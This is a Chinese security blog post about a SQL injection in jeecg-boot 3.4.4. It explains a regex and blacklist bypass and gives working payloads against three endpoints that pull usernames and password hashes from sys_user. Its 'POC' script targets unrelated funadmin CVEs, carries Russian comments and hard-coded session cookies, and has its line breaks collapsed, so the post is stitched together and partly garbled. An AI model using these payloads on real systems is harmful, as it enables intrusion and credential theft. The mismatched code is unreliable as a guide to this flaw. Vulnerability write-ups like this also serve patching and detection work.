jeecg-boot SQL注入漏洞

admin 2023年4月17日02:28:56评论2,348 views1字数 6488阅读21分37秒阅读模式

一. 漏洞介绍

        jeecg是一个应用软件。一款基于代码生成器的智能开发平台。jeecg jeecg-boot v3.4.4版本存在安全漏洞,该漏洞源于通过构建block report组件发现包含SQL注入漏洞。

二. 影响范围

                版本号:3.4.4
                前端版本:vue2


三. 漏洞分析

SqlInjectionUtil类中sql的注释正则为

private final static Pattern SQL_ANNOTATION = Pattern.compile("/\*.*\*/");

.无法匹配到%0A, 导致可以利用/*%0A*/绕过
关键字检测后存在空格,导致绕过

private final static String XSS_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()";


AbstractQueryBlackListHandler类中的黑名单:

ruleMap.put("sys_user", "password,salt");

在isPass函数中ruleMap.get(name)为null即可绕过, 可以采用sys_user, (sys_user), sys_user%20等绕过。

四. 漏洞复现

存在多个注入点:

  1. /sys/duplicate/check接口:

dataId=2000&fieldName=(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where/*%0A*/username/*%0A*/='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal=1000&tableName=sys_log

jeecg-boot SQL注入漏洞

  1. /sys/api/getDictItems


    该接口没有进行签名校验:

jeecg-boot SQL注入漏洞

?dictCode=sys_user%20,username,password

jeecg-boot SQL注入漏洞

  1. sys/dict/queryTableData

?table=%60sys_user%60&pageSize=22&pageNo=1&text=username&code=password

jeecg-boot SQL注入漏洞


五. 漏洞修复

            更新当前系统或软件至最新版,完成漏洞的修复。

六. 漏洞检测POC

import requestsimport sysimport urllib.parseimport uuid


'''Генирация X-CSRF-TOKEN'''
csrf_token =uuid.uuid4()csrf_token =str(csrf_token)csrf_token = csrf_token.replace('-', '')


'''Добавление общих для двух сплоиитов заголовков'''headers = {}headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"headers["Accept"] = "application/json, text/javascript, */*"headers["Accept-Language"]= "zh-CN,zh"headers["X-Requested-With"] = "XMLHttpRequest"headers["X-CSRF-TOKEN"] = csrf_token


'''Сплоит для CVE-2023-24775'''def poc_CVE_2023_24775(url):


headers["Host"] = url headers["Content-Type"] = "application/x-www-form-urlencoded" headers["charset"] = "UTF-8" headers["Accept-Encoding"]= "gzip"

url=str(url) url=url+"/backend/member.memberLevel/index?parentField=pid&"

'''Добавление куки файлов - внимание если эти куки вам не подхдоят можете заменить на ваши сессионные куки ''' cookies={'Hm_lvt_ce074243117e698438c49cd037b593eb':'1673498041','PHPSESSID':'591a908579ac738f0fc0f53d05c6aa51', 'think_lang':'zh-cn', 'Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed':'1674888420', 'Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed':'1674888420', 'auth_account':'YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D', 'clound_account':'YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D' }

''' Ввод sqli если вы не ввели ничего то ввод стандартной иньекции''' sqli= str(input("input selectFields[name]=name&selectFields[value]=your select sqli"))

if(len(sqli)!=0):
sqli = urllib.parse.quote_plus(sqli) url=url+sqli
else: url=url+"selectFields%5Bname%5D=name&selectFields%5Bvalue%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cuser()%29%29"

print(url)

'''Запрос на инькцию и вывод ответа''' sqli_request= requests.get(url, cookies=cookies, headers=headers)
print(sqli_request.text)

'''Проверка есть в тексте ответа sqli_request "message", если есть то скорее всего сплоит работает: https://github.com/funadmin/funadmin/issues/9''' if('message' in sqli_request.text):
print('**POC CVE-2023-24775 sqli works** :)') else:
print('**POC CVE-2023-24775 sqli not works** :(')


'''Сплоит для CVE-2023-24780'''def poc_CVE_2023_24774(url):


headers["Host"] = url headers["Origin"] = url headers["Accept-Encoding"] = "gzip, deflate"

url=str(url) url=url+"/databases/table/columns?id='"

'''Добавление куки файлов - внимание если эти куки вам не подхдоят, можете заменить на ваши сессионные куки ''' cookies={'Hm_lvt_ce074243117e698438c49cd037b593eb':'1673498041', 'ci_session':'ca40t5m9pvlvp7gftr11qng0g0lofceq', 'PHPSESSID':'591a908579ac738f0fc0f53d05c6aa51', 'think_lang':'zh-cn', 'Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed':'1674888420', 'Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed':'1674888420', 'auth_account':'YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D', 'clound_account':'YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D'}


''' Ввод sqli, если вы не ввели ничего то ввод стандартной иньекции''' sqli= str(input("input sqli:"))

if(len(sqli)!=0):
sqli = sqli.replace(' ', '+') url=url+sqli+"--+qRTY"
else: url=url+"+AND+GTID_SUBSET(CONCAT(0x12,(SELECT+(ELT(6415=6415,1))),user()),6415)--+qRTY"
print(url)

'''Запрос на инькцию и вывод ответа''' sqli_request= requests.get(url, cookies=cookies, headers=headers)
print(sqli_request.text)


'''Проверка есть в тексте ответа sqli_request "message", если есть то скорее всего сплоит работает: https://github.com/funadmin/funadmin/issues/6''' if('message' in sqli_request.text):
print('**POC CVE-2023-24774 sqli works** :)') else:
print('**POC CVE-2023-24774 sqli not works** :(')


if __name__ == "__main__":

args = ['-h','-u']
if args[0] in sys.argv: print("-h= help, -u=url; python sql.py -u https://site.com")

if args[1] in sys.argv:

url=sys.argv[2]
which_cve=int(input("which cve test,CVE-2023-24775 or CVE-2023-24780? if CVE-2023-24780 enter 1, if CVE-2023-24775 enter 2:"))

if(which_cve==1):
poc_CVE_2023_24775(url)
if(which_cve==2):
poc_CVE_2023_24774(url)


七.参考链接


https://github.com/jeecgboot/jeecg-boot/issues/4511  https://github.com/jeecgboot/jeecg-boot/issues/4393https://github.com/csffs/CVE-2023-24775-and-CVE-2023-24780/blob/main/sqli_poc.py


jeecg-boot SQL注入漏洞


本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。文库内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!


敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。




原文始发于微信公众号(无问之路):jeecg-boot SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月17日02:28:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   jeecg-boot SQL注入漏洞https://cn-sec.com/archives/1657315.html

发表评论

匿名网友 填写信息